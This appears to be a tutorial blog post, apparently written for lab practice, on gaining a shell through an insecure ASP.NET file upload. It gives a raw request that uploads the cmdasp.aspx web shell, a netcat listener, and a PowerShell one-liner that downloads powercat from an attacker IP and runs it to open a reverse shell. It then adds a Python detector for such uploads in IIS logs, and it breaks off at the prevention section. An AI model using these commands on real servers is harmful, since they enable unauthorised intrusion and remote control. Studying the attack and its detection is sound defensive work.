Published on March 21, 2025
ASPX stands for "Active Server Page Extended" and is a file type used in Microsoft ASP.NET applications. It contains server-side C# code that runs on a Windows web server. When a user accesses an .aspx page, the server processes the embedded code and returns the resulting HTML.
Many web applications allow users to upload files. If the app does not properly restrict file types or validate content, an attacker can upload a malicious .aspx file (web shell). When this file is accessed, it executes commands on the server with the same privileges as the web server process (often SYSTEM).
Use the famous cmdasp.aspx shell. It provides a simple form where you can input system commands and see their output.
This is an example of the raw HTTP request to upload cmdasp.aspx:
POST /vulnerable/upload.aspx HTTP/1.1
Host: target-server
Content-Type: multipart/form-data; boundary=---------------------------71636478919038147531957268791

-----------------------------71636478919038147531957268791
Content-Disposition: form-data; name="ctl00$MainContent$FileUploadControl"; filename="cmdasp.aspx"
Content-Type: application/octet-stream

[Insert full contents of cmdasp.aspx here]
-----------------------------71636478919038147531957268791--
Replace the path and form field names as needed depending on the web app structure.
After uploading, go to:
http://target-server/uploads/cmdasp.aspx
You’ll see a form asking for a command. This is the interactive shell.
On your attack machine:
nc -lvnp 4444
In the same folder as powercat.ps1:
python3 -m http.server 80
In the web shell input, run:
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.245/powercat.ps1');powercat -c 192.168.45.245 -p 4444 -e powershell"
The command downloads and executes the reverse shell, connecting back to your Netcat listener.
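From the defender's side, the upload and first use of the shell leave a recognizable trace in the IIS access log: a script file being requested inside the upload directory, which should only ever serve static content. The following is an added example, not part of the original post; the `/uploads/` prefix, the extension list and the sample log lines are assumptions constructed for illustration.

```python
"""Flag requests for server-executable files inside an upload directory (IIS W3C logs)."""
from pathlib import PurePosixPath

# Assumptions for this example: adjust to the application's real upload path.
UPLOAD_PREFIX = "/uploads/"
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".config"}

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_upload_execution(lines):
    """Return findings for script requests under UPLOAD_PREFIX that were not rejected."""
    posted_from = set()  # client IPs that sent a POST elsewhere earlier in the log
    findings = []
    for req in parse_w3c(lines):
        stem = req["cs-uri-stem"].lower()
        in_uploads = stem.startswith(UPLOAD_PREFIX)
        # A script name may be followed by extra path segments, so check every segment.
        is_script = any(PurePosixPath(s).suffix in EXECUTABLE_EXT for s in stem.split("/"))
        if in_uploads and is_script and not req["sc-status"].startswith("4"):
            findings.append({
                "time": f'{req["date"]} {req["time"]}',
                "client": req["c-ip"],
                "path": req["cs-uri-stem"],
                "method": req["cs-method"],
                "client_posted_before": req["c-ip"] in posted_from,
            })
        if req["cs-method"] == "POST" and not in_uploads:
            posted_from.add(req["c-ip"])
    return findings

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-03-21 10:00:01 GET /default.aspx - 203.0.113.7 200
2025-03-21 10:00:09 POST /vulnerable/upload.aspx - 198.51.100.23 200
2025-03-21 10:00:15 GET /uploads/report.pdf - 203.0.113.7 200
2025-03-21 10:00:31 GET /uploads/cmdasp.aspx - 198.51.100.23 200
2025-03-21 10:00:44 POST /uploads/cmdasp.aspx - 198.51.100.23 200
2025-03-21 10:01:02 GET /uploads/old.aspx - 203.0.113.7 404
""".splitlines()

if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

Any finding is worth triage on its own; `client_posted_before` marks the cases where the same client submitted a form shortly before requesting the script.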
This kind of exploit can be prevented by: